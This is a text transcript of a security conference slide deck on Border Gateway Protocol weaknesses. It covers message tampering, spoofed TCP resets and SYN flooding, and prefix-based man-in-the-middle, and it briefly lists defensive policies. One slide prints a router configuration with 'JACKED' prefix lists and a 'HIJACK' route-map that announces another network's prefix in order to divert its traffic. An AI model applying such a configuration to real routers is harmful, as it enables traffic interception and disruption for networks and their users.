Top Banner
TIME TO SHUTDOWN INTERNET CORE ROUTER HTTP://IPSECS.COM
17
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Page 1: BGP Vulnerability

TIME TO SHUTDOWNINTERNET CORE ROUTER

HTTP://IPSECS.COM

Page 2: BGP Vulnerability

COMMUNICATION

Analog communication Digital communication Analog communication to

digital communication convergence

Internet Protocol

Page 3: BGP Vulnerability

FUTURE COMMUNICATION

IP based communication will become the core communication?

Scalability and reliability communication infrastructure?

Vulnerability and security threat?

Page 4: BGP Vulnerability

CORE COMMUNICATION

Access Control List? Default password issue? Weak password? Unencrypted remote login? Routing protocol vulnerability? We will focus on Border Gateway 

Protocol (BGP) now

Page 5: BGP Vulnerability

BGP VULNERABILITY

BGP messages TCP vulnerability BGP internet man in the

middle Documented on RFC 4272

Page 6: BGP Vulnerability

BGP MESSAGES

BGP states? idle, connect, active, opensent, openconfirm, established

BGP message? open, update, notification, keep alive

BGP message modification to poison routing table and Denial of Service

Complex and nearly impractical

Page 7: BGP Vulnerability
Page 8: BGP Vulnerability

TCP VULNERABILITY

BGP and TCP port 179 SPOOFED TCP RST/FIN? TCP port flooding (SYN) TCP session ends = BGP idle

Page 9: BGP Vulnerability
Page 10: BGP Vulnerability

BGP MAN IN THE MIDDLE More specific network prefix wins Use tracroute to identify routing

from source to destination Use route-map and AS-PATH

prepending Static routing to give information

about next-hop-router

Page 11: BGP Vulnerability
Page 12: BGP Vulnerability

router bgp 100network 10.10.220.0 mask 255.255.255.0neighbor 2.2.4.2 remote­as 40neighbor 2.2.4.2 prefix­list JACKED outneighbor 2.2.4.2 route­map HIJACK outneighbor 4.3.2.1 remote­as 10neighbor 4.3.2.1 prefix­list ANN outneighbor 5.4.3.1 remote­as 60neighbor 5.4.3.1 prefix­list JACKED outneighbor 5.4.3.1 route­map HIJACK out!ip route 10.10.220.0 255.255.255.0 4.3.2.1!ip prefix­list ANN seq 10 permit 2.2.4.0/24ip prefix­list ANN seq 15 permit 4.3.2.0/24ip prefix­list ANN seq 20 permit 5.4.3.0/24!ip prefix­list JACKED seq 10 permit 2.2.4.0/24ip prefix­list JACKED seq 15 permit 4.3.2.0/24ip prefix­list JACKED seq 20 permit 5.4.3.0/24ip prefix­list JACKED seq 25 permit 10.10.220.0/24route­map HIJACK permit 10set as­path prepend 10 20 200

Page 13: BGP Vulnerability
Page 14: BGP Vulnerability

SOME POLICIES

Design and topology? Access Control List implementation? Complex password Encrypted connection (SSH & HTTPS)

Page 15: BGP Vulnerability

DEMO BGP ATTACK

Page 16: BGP Vulnerability

QUESTION? ANSWER

Page 17: BGP Vulnerability

THANK YOU